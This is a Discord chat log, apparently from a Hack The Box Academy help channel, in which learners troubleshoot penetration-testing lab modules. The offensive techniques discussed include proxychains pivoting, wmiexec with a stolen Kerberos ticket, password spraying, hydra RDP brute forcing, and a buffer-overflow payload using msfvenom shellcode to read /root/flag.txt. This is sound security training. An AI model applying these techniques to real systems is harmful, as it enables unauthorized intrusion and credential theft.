We created a reverse tunnel using chisel so now we have a traffic coming to/from the MS01 host. We steal a Kerberos Ticket from LINUX01 (with another method we dont care for now), and when importing it to our attack host and use $ proxychains impacket-wmiexec dc01 -k this allows the impacket-wmiexec to spawn an interactive shell thanks to that ticket we previously imported that will serve as our pass when the wmiexec does its job on the target network? Thanks in advance and id appreciate any other useful resource or tip!

worn matrix
#

Is there going to be any module about OS/KERNEL EXPLOITATIONS and also PCI compliance techniques/methodoly etc?

fathom pendant
fathom pendant
pine dune
#

Hi, I know this isn't an academy question but any help would be appreciated. But why does this keep loading?

cloud urchin
#

@nimble scroll that module is above t0, please don't post content from modules above t0.

cloud urchin
bronze wharf
#

hello guys , i am in payload & shells host1 , i craft a payload and open multi handler and , navigate to the shell from the browser but i get 404 . can anyone help ?

quartz sundial
#

Module: Pivoting, Tunneling, and Port Forwarding

Hello everyone! Can anyone help?

I’m trying to scan a host in the internal network through a pivot host using proxychains.

I use the command: proxychains nmap -vv -sV --top-ports=20 172.16.5.35

And I get the error: Segmentation fault (memory image flushed to disk)

When I use the command (without -sV): proxychains nmap -vv --top-ports=20 172.16.5.35

I don't get the error.

Of course, when I scan hosts in the local network, there is no issue with -sV. So it seems to be a problem with proxychains. But what’s the problem? The connection to the internal host is working fine; I can, for example, connect to the internal host via RDP through the pivot host.

I’m connecting via SOCKS5 proxy.

Has anyone encountered such an annoying problem?

waxen totem
proud pine
quartz sundial
#

-sV scanning use another type of packes?

inner folio
proud pine
inner folio
#

@cloud urchin I advised the boy to use socks4 instead of version 5, because the module always shows version 4 in use, also I'm doing the module, and using version 4 I'm not having problems for now

cloud urchin
#

but that's still a socks proxy

inner folio
#

it was a suggestion, you could try

proud pine
grim plaza
#

Any one here from htb support team

compact patrolBOT
real delta
fair cove
#

Hey everyone whats up? I am using netexec for a question on password spraying for this question. --On an engagement you have gone on several social media sites and found the Inlanefreight employee names: John Marston IT Director, Carol Johnson Financial Controller and Jennifer Stapleton Logistics Manager. You decide to use these names to conduct your password attacks against the target domain controller. Submit John Marston's credentials as the answer. (Format: username:password, Case-Sensitive). I have already created a file with the appropriate usernames. The problem i see on the command line after netexec finishes that many passwords are not even tried. I have done this question before like a year back or so so I know the answer but the tool just doesnt find it. I am using the fasttrack wordlist.

flat river
#

facing problem in this step

tranquil crystal
#

what problem

real delta
flat river
real delta
# flat river

And what does the module say before you run the command?

tranquil crystal
#

Can you link to the module please

flat river
tranquil crystal
#

So the instructions before it just say how to update the system

#

tools.list is just a list of tools you can install them manually

#

look at the next step

#

try looking for the file on the system

#

locate tools.list might tell you where it is

waxen totem
#

The file doesnt exist by default gotta make it

tranquil crystal
#

That's what I was thinking

#

it says to make a list

flat river
tranquil crystal
#

bro. SNIP means it's omitted. Read the command and type the packages manually

real delta
flat river
tranquil crystal
#

no problem.

real delta
storm elk
tranquil crystal
#

or make a tools.list of the tools you want to install and follow the next step

tranquil crystal
#

Are you new to linux?

flat river
tranquil crystal
#

If so you might benefit from the linux fundamentals module

real delta
# flat river ok

Parrot should have a package group for their security tools, instead of reading from a file you just grab a bunch of ones that would be in it

rustic sage
#

Right ways to learn hacking ?

real delta
flat river
compact patrolBOT
tranquil crystal
#

for @rustic sage

real delta
waxen totem
rustic sage
#

In text @real delta

waxen totem
#

In all seriousness just follow the beginner's bible

real delta
#

Just read the blog from the getting started bruh

rustic sage
real delta
flat river
waxen totem
#

You can skip most things in the setting up module if you're using parrotOS

flat river
#

wireshark is already installed and some other tools which are mentioned also installed

#

thanks for the help

fallow monolith
#

I am currently taking the OS fundamentals course and I'm at the linux part. I always have issues when I try to SSH into the target machine. Can someone tell me the procedures in case I am doing anything wrongly.

storm elk
#

What issue are you having?

fallow monolith
#

The password for the machine is being requested, I input it and get a message that I am denied

#

Am I putting in the wrong password or what ?

storm elk
#

can you show me your command?

#

Also - are you connected to the vpn?

fallow monolith
#

Give me a minute to do that.
How do I connect to the vpn ?

fathom pendant
#

are you using the pwnbox or your own machine

#

pwnbox == in-browser vm

storm elk
#

good question 🙂

fathom pendant
#

if using pwnbox, then you don't need to connect

fallow monolith
#

Yes I’m using the pwnbox

storm elk
#

Then you should be fine on the VPN part

fathom pendant
#

ok so next question:
what does your command look like that you're trying to connect to the target?

rustic sage
#

Can I ask 1 simple question ❓

fathom pendant
#

you just did, that's all your questions used up; please insert 1 fakecoin into your account to ask more

rustic sage
#

Simple question is what is hacking (no cheating ) ?

rustic sage
#

That cheating

fathom pendant
#

?

rustic sage
#

U should tell by own

fathom pendant
#

dude

storm elk
fathom pendant
#

you asked a googleable question

storm elk
#

Read #welcome and follow instructions to get access to talk there

fathom pendant
#

since we have a lot of people that are ESL (English Second Language) your question came off in a way that made the assumption you were asking what hacking was, but not cheating as in game cheating

storm elk
#

I have ETL

fathom pendant
storm elk
#

we know hugthebox

fathom pendant
#

you weren't supposed to agree PepeHands

rustic sage
#

I am new here

storm elk
fathom pendant
rustic sage
#

I read it

fathom pendant
#

then you'd know what the server is about and how to verify and link your HTB account :)

rustic sage
#

I have not HTB account now but I will made it soon

fallow monolith
# fathom pendant ok so next question: what does your command look like that you're trying to conn...

owerShell 7.5.0
Welcome to Parrot OS

Welcome to Pwnbox, Powered by Parrot OS
PS [10.10.14.192] /home/htb-ac-1793917 > ssh 10.129.116.172 [@htb-student]
The authenticity of host '10.129.116.172 (10.129.116.172)' can't be established.
ED25519 key fingerprint is SHA256:PHsjpBEAl6hSCzjVohppUybupbLXdBZy8FqtwlMpmjU.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.116.172' (ED25519) to the list of known hosts.
htb-ac-1793917@10.129.116.172's password:
Permission denied, please try again.
htb-ac-1793917@10.129.116.172's password:
Permission denied, please try again.
htb-ac-1793917@10.129.116.172's password:

storm elk
#

you should be doing this: ssh htb-student@10.129.116.172

#

right now the user you're trying to connect with is your htb pwnbox username

rustic sage
storm elk
rustic sage
#

Yup

storm elk
rustic sage
#

But nothing happen

storm elk
#

You did not follow the instructions then @rustic sage

#

it's three simple steps

real delta
rustic sage
#

What that was step ?

fathom pendant
storm elk
fathom pendant
#

since this would be technically the most active channel you can access

storm elk
#

3 steps, can't miss

fallow monolith
storm elk
fathom pendant
#

i believe just at the bottom of the reading portion

rustic sage
#

I made my HTB account now what to do

storm elk
rustic sage
#

Where is account identifiyer

storm elk
#

Step one tells you

rustic sage
#

How to cheak and copy it

storm elk
#

There's a direct link

rustic sage
#

Yes but how to ding account identifiyer location

#

Ding = find

storm elk
#

are you on your phone?

rustic sage
#

Yes

storm elk
#

The link in the #welcome section points you right to the page where the identifier is

#

you just have to copy/paste it in the command /identify token-here

#

Try landscape mode or request desktop version 🙂 some phones can't parse the screen properly

rustic sage
#

Is that start with #

#

No

#

Number

storm elk
rustic sage
#

I done it

#

Thanks u

storm elk
rustic sage
#

Are u bot

storm elk
#

no

rustic sage
#

User

#

Why u help me ?

storm elk
tender acorn
#

I have some troble to find the correct size. Also the format give me questions.

´Modul: Stack-Based Buffer Overflows on Linux x86
Kaptittel: Determine the Length for Shellcode
Question: How large can our shellcode theoretically become if we count NOPS and the shellcode size together? (Format: 00 Bytes)´

Did the Format: 00 Bytes mean Dez or Hex 00-99 00-FF
is: 00 00 00 00 also possible?

The next part is what is the Size now:

Buffer = "\x55" * (1040 - 100 - 150 - 4) = 786
NOPs = "\x90" * 100
Shellcode = "\x44" * 150
EIP = "\x66" * 4
the current shellcode is 68

but what is the largest possible?
1036?
936?
250?

fathom pendant
#

00 is hex

#

x00 is null bytes

tender acorn
#

with the x or without

#

ff or FF make also a difference

merry spire
#

I need help. Please, how do I get multiple URLs from keywords?

fathom pendant
merry spire
#

It’s for a personal educational project.

fathom pendant
#

then it's not for this channel, read and follow #welcome to gain access to more of the server

urban elk
#

is it just me or is it nearly impossible to have findings with a "Low" (say, below 4.0) CVSS 3.1 score?

Take the "Directory listing enabled" finding example in the Documentation & Reporting module. This is a case where no sensitive data was found in said directories.

They got it to score 4.3 (and made it a "Low" too but technically 4.3 is "Medium") I guess by marking it as Adjacent attack vector, but if I can reach the relevant site from the Internet I think it should be Network, plus a Low confidentiality impact, making it a 5.3. The best I can do is change the Environmental factor for Confidentiality Requirement to also be Low, bringing it down to 4.6... still medium, and still sounding excessive, taking attention away from more important issues.

kind forum
#

Hi folks, any academy modules can help me prepare OSEP? Please share some thoughtsprayge

analog dock
#

Kerberos attacks for example

dusty bison
#

hi folks, lm doing the Linux Fundamentals module.
l got stuck on these 2 question under the filter content section

  1. How many services are listening on the target system on all interfaces? (Not on localhost and IPv4 only)
  2. Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths (https://www.inlanefreight.com/directory" or "/another/directory") of that domain. Submit the number of these paths as the answer
rustic sage
#

Is anybody onlien

fathom pendant
#

For number 2. You can search the channel using ctrl+f or the magnifying glass icon

fathom pendant
supple dragon
#

You can DM me but might take a few hours until I can get back to you

inner folio
#

hello guys, i have a doubt about subscriptions.

i currently have the annual silver plan ($500) every year

i plan to buy a module that costs 1000 cubes

my idea was to do the monthly subscription of $78, so as to receive 1000 cubes and buy the osint module. or do the monthly subscription of 38 and maybe buy some remaining cubes (i already have 200).

but i have some questions.

can i do a monthly subscription while i have an annual subscription?

if i could, when i pay the $78, will i receive the 1000 cubes immediately or will i have to wait 1 month?

instead in that case i could not pay the monthly subscription. can i cancel the annual subscription so i can then do the monthly one?, i still have about 6 months to enjoy the benefits of the annual one, so i don't want to lose the benefits if i cancel the subscription. so my question is, if i cancel the 1 year silver subscription, do i lose access to the modules up to tier || ? and can i then do the monthly one?

autumn pilot
#

best to reach out to support to find the answer

compact patrolBOT
inner folio
#

one more thing, how can you access the general chat? Isn't it enough to have the $500 subscription?

proud pine
#

I'm fairly certain that you can't stack subscriptions.

autumn pilot
tender acorn
woven copper
#

Hi man, can i DM you ?

calm abyss
calm abyss
shut ice
#

Can anyone help with a beacon not calling back with Sliver? I can run the beacon direct as an .exe but can't execute it as shellcode for some reason

calm abyss
tender acorn
calm abyss
#

250 bytes you have to add that

tender acorn
#

around 1-2 hourers lost

calm abyss
# tender acorn but FA fa xfa xFA /xfa /xFA are all wrong and also 250

How large can our shellcode theoretically become if we count NOPS and the shellcode size together? (Format: 00 Bytes)

Buffer = "\x55" * (1040 - 100 - 150 - 4) = 786
NOPs = "\x90" * 100
Shellcode = "\x44" * 150
EIP = "\x66" * 4

NOPS is 100 bytes and shellcode is 150 so thats 250 Bytes

tender acorn
#

i think thy "Bytes" was more about 00

calm abyss
# tender acorn i think thy "Bytes" was more about 00

0x90 in hexadecimal represents the number 144 in decimal.

Additionally, in the context of assembly language (x86 architecture), 0x90 is the NOP (No Operation) instruction, often used in exploits and shellcode.

NOPs = "\x90" * 100 will print x90 hex 100 times

tender acorn
calm abyss
tender acorn
#

now i know just a misunderstanding

calm abyss
stiff aurora
#

good morning. I have a question I'm in the module "Pivoting, Tunneling, and Port Forwarding " in Skills Assessment: I'm trying to connect RDP using proxychains to 172.16.5.35 but I get error failled to connect to 172.16.5.35

#

proxychains] Dynamic chain ... 127.0.0.1:9050 ... 172.16.5.35:3389 <--socket error or timeout!

calm abyss
stiff aurora
#

are they working fixing the VPN

#

Because I don't see any announcements about it!

calm abyss
stiff aurora
#

is working in pwn box?

calm abyss
#

well i switched to vpn i used pwnbox

calm abyss
stiff aurora
#

yes, I'm doing right now this one : Use the information you gathered to pivot to the discovered host. Submit the contents of C:\Flag.txt as the answer.

#

I was trying to connect to RDP to 172.16.5.35 but i get error connection proxychains xfreerdp, the think I don't finish this part last night I found all the port open now I come back this morning the port and trying to finish I found all port closed : 22/tcp closed ssh
135/tcp closed msrpc
445/tcp closed microsoft-ds
3389/tcp closed ms-wbt-server
5985/tcp closed wsman

calm abyss
#

refresh my memory, how did you connect to 172 network i got creds found from the /home directory

stiff aurora
#

from you virtual machine or pwnbox?

shut ice
#

What proxy have you setup?

stiff aurora
#

5

shut ice
#

Chisel? SSH ?

stiff aurora
#

ssh

calm abyss
#

virtual machine

shut ice
#

Looks like your proxychains isn't set correct

#

Try run Crackmap/Netexec with SMB over proxychains to check

stiff aurora
#

ok will restart the VM better am start all over again !

shut ice
#

What SSH command are you running to port forward?

stiff aurora
#

sudo ssh -i id_rsa webamin@ip:~/

shut ice
#

You are missing the port forwarding

woven copper
#

@calm abyss how do you suggested bypass the DRM in the Game Moding Skill assessment, i try to hook the checkStart() function and modifiy the num value

shut ice
#

check the module does it add like SSH -R 3389:IP:3389?

#

or they run chisel or something?

calm abyss
elder matrix
#

when i use echo ${LANG} it shows en_US.UTF-8
How come i cannot see the "-" anymore when i use this commmand:

 echo ${LANG:9:1}

i only see a blank space.. it worked yesterday..
i can see all the other characters, but not -

#

is there a command to make it appear again?

rain saffron
#

I'm doing the attacking web apps with ffuf module on Kali with vpn but I'm getting like 70req/s which is taking forever with the small word list the module says to use, is there a way to make ffuf faster, I have it set to -t 100

#

Module mentions how it can get thousands a second

plucky torrent
#

Hey guys, I’m new here trying to start hack the box challenges and I’m trying to pwn the machine titanic but finding it difficult, any help or guidance plsss

astral egret
#

its been 3 days i give up on these

#

keep encountering this problem where LaZagne aint working for some reason

#

please dm me if you can help

graceful skiff
#

Hello guys, i was reading through some modules for the SOC analyst job path(i am a newbie) and in the "Security Monitoring & SIEM Fundamentals" module on the skill assessment section i was unsure about the answer in one of the question. Is there somewhere like a forum that can help me understand why one of the answers i gave was not the correct one? what should i be on the lookout for in these kinds of situations? Thanks in advance

graceful skiff
#

it was this one. you see the correct answer here, but there was one admin user with much more failed log in attempts, my question was should i be looking at something different for this question since everything seemed good.

tranquil axle
#

Hmmm I need to see the dashboard again for this one. The skill assessment really just wants you to focus on the one visualization it mentions in the question. I assume it was just a handful of unsuccessful logins and is meant to teach you that not every failed login is worth escalating

brazen saffron
#

Windows Privilege Escalation - SeDebugPrivilege

Trying to do the task but I'm getting this error after imported and running the command in this poc: https://github.com/decoder-it/psgetsystem/tree/master

> . .\psgetsys.ps1


> ImpersonateFromParentPid -ppid 612 -command "cmd.exe"
Exception calling "CreateProcessFromParent" with "3" argument(s): "Not all privileges or groups referenced are assigned to
the caller"
At C:\Users\jordan\psgetsys.ps1:175 char:1
+ [MyProcess]::CreateProcessFromParent($ppid,$command,"$command $cmdarg ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : Win32Exception
GitHub

getsystem via parent process using ps1 & embeded c# - decoder-it/psgetsystem

storm shard
#

Can someone give me a nudge with reverse engineering? I am in the stack based buffer overflows for x86 section

stiff aurora
#

how can you Paste Screenshot here?

storm shard
#

screen snip

stiff aurora
storm shard
stiff aurora
#

you mean sniptool?

spiral sapphire
#

Yo! Quick question. For Metasploit do I set LHOST to VPN IP or use my own?

faint wagon
#

Can anyone tell me the ip for the web server on the internal network using pwnbox. This is related to pivoting module and rpivot section

#

Because I used firefox with proxychains for 172.16.5.135, it's getting timeout error

shut vapor
spiral sapphire
#

Oh that's a nice tip! thanks!

storm shard
#

Does anyone know re?

#

I am having trouble with stack overflow

blazing ivy
astral egret
stable mantle
#

Hello all ! I started htb academy today. I am actually doing network foundations.
But for the question 2 of the skills assessment :
What is the name of the program listening on localhost:5901 of the Pwnbox
I have no idea where to look at... I work with the vpn, tried nmap but the answer it gave me doesn't work... Thanks for your help !! 🙂

shut vapor
waxen mesa
#

Hey I’m trying to complete the network foundation module but when I do the calculation for the port and try to connect to net cat it tells me connection refused

blazing ivy
storm shard
waxen mesa
#

I answered every question except that last one

#

Yeah

storm shard
#

Yeah to me?

waxen mesa
#

Yes

storm shard
#

Hit the windows symbol key, then type snipping and use that for screenshots

#

you can just hit the copy button and paste it directly in here

graceful ferry
#

You can also WIN + SHIFT + S to take a screenshot, it auto copies it and you can paste it here

waxen mesa
#

I don’t want to leak the up address

#

Ip *

storm shard
#

^ but snipping allows you to just grab a piece of it - like this

graceful ferry
#

So does WIN SHIFT S

storm shard
#

O.o

waxen mesa
#

Oh and I don’t have discord on windows I’m using it on my phone

storm shard
#

holy shlit

#

i thought it was like prt scr xD

#

thats useful lol

#

can anyone help with stack overflows?

graceful ferry
#

@waxen mesa By leaking the IP do you mean your IP? If you're doing it via pwnbox it usually shows internal IP, which you can freely do i guess

storm shard
#

..or rather, answer a question about the assessment?

waxen mesa
#

I’m on pawnbox

#

I just wanna know tho is this netcat method the only way to get the answer because what if it’s not a mistake that I get refused connection on my end

#

I don’t know if you guys did this module before

#

There’s has to be another way to bypass the request filtering

#

Without using netcat

#

Because I can’t get the calculation right which I tried multiple times

graceful ferry
#

To be fair, i didn't do the modules, but I've done some other ones on the site. And usually when you're stuck like this, most of the time it's something simple (but not obvious). It might be good to re-read the whole section for that question again, and see if you've missed something, a crucial step or something like that

waxen mesa
#

Yeah I don’t know man

#

I just tried again

paper lodge
#

Hi Guys, can anyone give me some hints on this windows priv esc skill assessment question "Find the password for the ldapadmin account somewhere on the system*

waxen mesa
#

This is nuts 🥜 lmao 😂

#

And there’s not even any write up for a walkthrough I could find for this

ocean night
#

Uhh.. what command are you running? Looks like it's trying to do a DNS lookup

#

If you're connecting to an IP, it should not be doing that

waxen mesa
#

Net cat brother

#

I’m wondering if it’s a hack the box issue or is it really just me

#

Yeah I’m using and ip

ocean night
#

Right, but the rest of the command

#

Knowing it's netcat doesn't help much

#

There must be a character in the target that's causing it to be treated as a hostname, not an IP

waxen mesa
ocean night
#

Oh, it's the inverse lookup

#

Nevermind then. The FTP module can sometimes require a reset to get it working, not sure why personally.

waxen mesa
#

Oh wow 🤯

paper lodge
waxen mesa
#

That’s the thing with this IT stuff sometimes you think it’s you whole time it’s it lmao 😂

#

I would have sat here for minutes trying to figure out why this not working thanks for your input now I know I can just move on

ocean night
#

Was the ftp command used in the module and exercises you went through?

#

Can't really say much more on it, as it's a tier 2 module

#

Good luck 🙂

waxen mesa
#

Tbh just ping,nc,nmap and other but no ftp from the looks of it

waxen mesa
ocean night
#

Check through the section content - the solution is not always directly demonstrated, and you may need to go through some research of the tooling and methods mentioned.

#

When I say it's tier 2, I mean that spoilers for modules over tier 0 are not allowed

waxen mesa
#

Ok

ocean night
#

so I can't say any more really 🙂 (check the channel topic, and the terms of service)

storm shard
#

Is stack based overflows for x86 linux tier 0?

ocean night
#

It will say which tier it is on the module overview

storm shard
#

O.o

#

Yes tier 0

#

Can I ask a question here without spoiling then with more information?

ocean night
#

If it's tier 0 you can ask and state as much as you want. If it's not, then you must not post specifics regarding the module or exercises.

Asking for help without providing specifics sounds pointless, but some do offer to reach out in DM to hear you out. Just don't trust anyone that sends you a DM saying you should join another Discord for support. Those people are worms, scammers and hardly human.

#

Tier 0 = Fundamental

empty trout
#

is it possible that only smbclient is working on a skill assesment smbmap rpcclient these tools are not working with null session only smbclient is working

storm shard
#

I am working on the assessment and have written over the $eip successfully with a pattern of 4 bytes at the end of my payload. I have tried to use msfvenom's read_file, and exec cat /root/flag.txt but these just make the msg.txt file into a VISX image? Do I need to use a reverse shell, or rather is that the intended route?

#

Tbh, I feel like these all might be able to work, but for some reason I am not getting a Segmentation fault when I use a shellcode payload. Is this due to me misaligning the payload when adding the shellcode, or is that expected when you redirect the instruction pointer onto the nop sled?

stable mantle
storm shard
#

If anyone knows how to give me a nudge please @ me! Ty

eager spoke
#

I've almost earned enough cubes from the student subscription to get a tier 3 module. Any recommendations? I'm learning towards "Supply Attacks".

empty trout
#

i am stuck on skill assessment hard of the module = attacking common services .

#

i can rdp into target and need to find the accounts which i can impersonate

#

then i need to impersonate as administrator and there is a flag on admin desktop dir

icy violet
# waxen mesa

the section starting with shell code nc -v <target ip> 80 (pretty much at the end of chapter 3) guides you through

bitter lark
ocean night
#

Oh crap, totally got confused between you UBNA and AJU

#

Thought it was you asking about that windows module, my bad

ocean night
mild jungle
#

kinda a tough question without more details

eager spoke
# mild jungle depends what you want out of it ig

I'm most interested in supply chain attacks right now. But, I've seen some modules that really weren't worth it and that you could research on your own better. I'm basically just wanting to make sure it's not a waste.

foggy monolith
#

Curious if there's any modules on the Academy dealing with AWS security, and particularly all the instance metadata endpoints to look for. A real-world startup I'm involved in uses AWS for their infrastructure, and it was only after watching a NahamSec video that I was able to figure out what kind of a threat the 169.254.169.254 IP address can pose, so I'm curious if there's anything in the Academy either now or planned for the near future to teach that in more detail.

empty trout
#

I AM HAVING A HARD TIME

#

SOLVING THIS SKILL ASSESSMENT

storm shard
#

me too

dark hedge
#

me too man

storm elk
#

Me too

graceful ferry
storm shard
#

I tried to ask for help in #binex-rev and they just sent me here xD

#

I'll try over there agin

empty trout
#

@fathom pendant if you are free can you help me on this one

fathom pendant
#

I don't appreciate being pinged directly about something

eager spoke
storm shard
#

Anyone able to help with stack overflow? I am pretty sure that I am very close to the answer, but I am having some issues with alignment, or perhaps my shellcode, or both, or neither...

#

I'll just describe it. I have my overflow payload writing over the eip successfully. So far it looks like this: "\x55" + "nopsled" + "shellcode" + "address somewhere in the nopsled" and the alignment is done programmatically via subtraction and multiplication like the module teaches: (2064 - 150 - 425 - 4) + 150 + 425 + 4. When I run this without the shellcode and eip redirection I can see it segfault and write what I picked to mark the stack for reference, but when I try the payload it exits successfully and doesn't exploit in any of the ways that I have tried successfully (though they do exit from gdb without error). I tried using msfvenom with exec to cat the flag, read_file to read it into the msg.txt that suid is controlling, and with a reverse shell (idk if this is intended, but if so I'll keep trying with only this one)

eager spoke
storm shard
#

It said it was in /root/flag.txt

#

I tried to use the msfvenom's exec shellcode with CMD='cat /root/flag.txt > /home/user/flag.txt'

#

with the proper names and whatnot ofc

#

I have tried some things that caused the msg.txt file to get filled with some junk that gives it a signature of VISX img file?

#

Not sure about that, but it makes me think that revshell is the intended route

eager spoke
#

Maybe try is "cat ~/root/flag.txt" just to make sure it's not that.. then try "CMD='sleep 5'" if that doesn't work.

#

Sleep 5 would at least help you narrow it down

storm shard
#

Yeah the sleep will be a telltale for sure, bc Idk what is really happening with my payload with it exiting successfully. The program moves to a completely different location in memory than where I injected my payload so I can't even examine what went wrong.

eager spoke
#

CMD='/bin/cat /root/flag.txt | tee /home/user/flag.txt' might work too

lusty thicket
storm shard
#

will tee just create the file? I always use tee -a for sudo pipes

#

O.o

eager spoke
#

Ah my bad. Yes. Use -a

storm shard
#

Maybe a dumb question, just not sure if the environment will get mangled bc of the difference in hosts ??

astral egret
#

anyone who did this please help

#

ITS BEEN 4 FUCKING DAYS

lusty thicket
lusty thicket
#

it really just depends on what your exploit depends on

fathom pendant
# astral egret

The module teaches you how to hunt the credentials in this context, did you try doing anything shown?

rugged bolt
#

hey ya'll working through Password Attacks/Network Services. I'm working on my last question which is to brute force the rdp login and submit flag. I've been running hydra for quite some time now with their given wordlists.

My question it to know if its worth it to run ncrack in parallel to speed up the brute force process or will that create issues?

storm shard
#

Hmmm

fathom pendant
storm shard
#

I am checking for bad characters again

#

If I missed one it could throw everything off without throwing an error right?

neon wadi
fathom pendant
#

i did the same for /home/ on the linux machines

fathom pendant
#

as i found out that most of the instances are shared i.e. all linux instances match the linux questions; all the windows matches windows (except for the ones regarding some AD stuff from domain joined linux)

#

the module also hints at this with some of the sections referring to previous sections for required passwords

#

so keeping credentials you find can also be helpful\

neon wadi
fathom pendant
#

@astral egret be careful with your words next time; :)

astral egret
#

sure man

fervent lantern
#

Hello, I wanted to ask about the Linux configuration module. Do I have to install repository by repository?

fathom pendant
#

you don't have to do it all; you can even do very little of it and be fine

fervent lantern
fathom pendant
#

there's no guide that encompasses all of everything; you don't have to do any of what's referenced

fervent lantern
#

I was doing everything XD

fathom pendant
#

if you want to do all the things; then yes you'll need to go repo by repo or check if they're in the apt repos

rugged bolt
#

I used ML's tip and generated a shorter username list by checking C:\Users however I still didn't get a hit. Perhaps I'm using the wrong syntax, however this syntax worked on the other network services. Does anyone see any slight misconfigs in my syntax?

fathom pendant
#

5 threads is low but that's neither here nor there

#

try resetting the lab and trying again

shell shadow
#

Wsp

fathom pendant
rugged bolt
#

yeah correct for each user it said may be a valid account but not setup for rdp. I agree sometimes resettting target helps, thanks

neon wadi
rugged bolt
storm shard
#

I want to share a snip of this block of bytes... the bad chars seem too abundant...

#

It looks like after 08, there are 4 bad bytes in a row?

#

is that correct?

fathom pendant
#

what you can do: copy that output and throw it into magicchef to decode to see what it may look like to see if anything breaks note that magicchef will translate 0x00 to NUL

storm shard
#

O.o

fathom pendant
#

it's just hex decoding, basically

storm shard
#

I'll look that up, but is that correct to assume for the time being? if it was changed in value, the original byte must be a bad char no?

fathom pendant
#

it looks like, for some reason; instead of going 0x09; 0x0a 0x0b 0x0c 0x... since it's counting up it goes from 0x08 to 0x78 0x30 0x39

neon wadi
# astral egret ofc i did

If you clicked on all the Desktop links and didn't find what you're looking for, maybe try again, starting at the end. It's not always obvious where to look, and sometimes things that look like they might be promising (link the creds folder containing a passwords file), are not going to help you. So just look into everything -- sometimes just opening a Desktop shortcut can be more fruitful than a fancy scanning tool.

astral egret
#

had to look inside scripts

#

the first one was obvi i was just stupid

#

the second one pointed to a scipt inside anotherscript that had creds

fathom pendant
#

correct

#

sometimes you just gotta pick up a shovel and dig

sand rose
#

Quick question about the Wi-Fi Penetration Testing Basics Module. I'm trying to RDP into it, but xfreerdp isn't working.

I went to ping to see if I was getting a response from the server and each ping said Destination host unreachable, and "10 packets transmitted, 0 received, +8 errors, 100% packet loss, time 9110ms
pipe 4"

I'm able to connect to other modules and labs perfectly fine, and I'm using the correct VPN file to connect up to HTB.

fathom pendant
#

reach out to support

compact patrolBOT
sand rose
#

Thank you

waxen mesa
fathom pendant
#

the tools in and of themselves aren't bad

sand rose
#

@fathom pendant I hope its ok to piggyback with a question (as I'm very much a noob myself still): What would you recommend instead? Doing it manually?

fathom pendant
#

but it's like telling someone new to the office to go to a place that everyone else in the office calls "xyz" while it's actual name is "zyx" i.e. "Go to the dungeon" --> " Go to the IT office"

fathom pendant
#

manual enumeration should always be your first go to; then automated if there's nothing that's popping out at you

sand rose
#

How does one know when they are "ready" for more automated tools like winpeas/linpeas/SQLMap/Metasploit etc

fathom pendant
sand rose
#

(I tend to stay away from the latter 2 atm)

Also fair enough.

fathom pendant
#

SQLMap is fine once you understand the basics of SQL

#

Metasploit i mostly only use if i can't be bothered to refactor a code from python 2.x to 3.11+

ocean night
#

2.7 for life!!!!

#

(please don't lynch me, it was a joke)

fathom pendant
#

searchsploit is a powerful tool as it allows you to copy the exploit code for editing or further reading (in some cases it's a text file that contains the basic instructions to exploit something)

neon wadi
rugged bolt
#

I reset the target and still can't brute force the rdp login. should I try on pwnbox? I would think yes however its weird I could brute force other services with hydra on my machine just not rdp

fathom pendant
#

i.e. run curl http://exploited.server -H "Some paramater: Some Value"...

fathom pendant
#

sometimes hydra is just silly

sand rose
#

@neon wadi @fathom pendant I appreciate both of y'alls feedback and help! Have a blessed day 🙂

storm shard
#

my b

#

it is tier 0 but I suppose I shouldn't put it out completely :x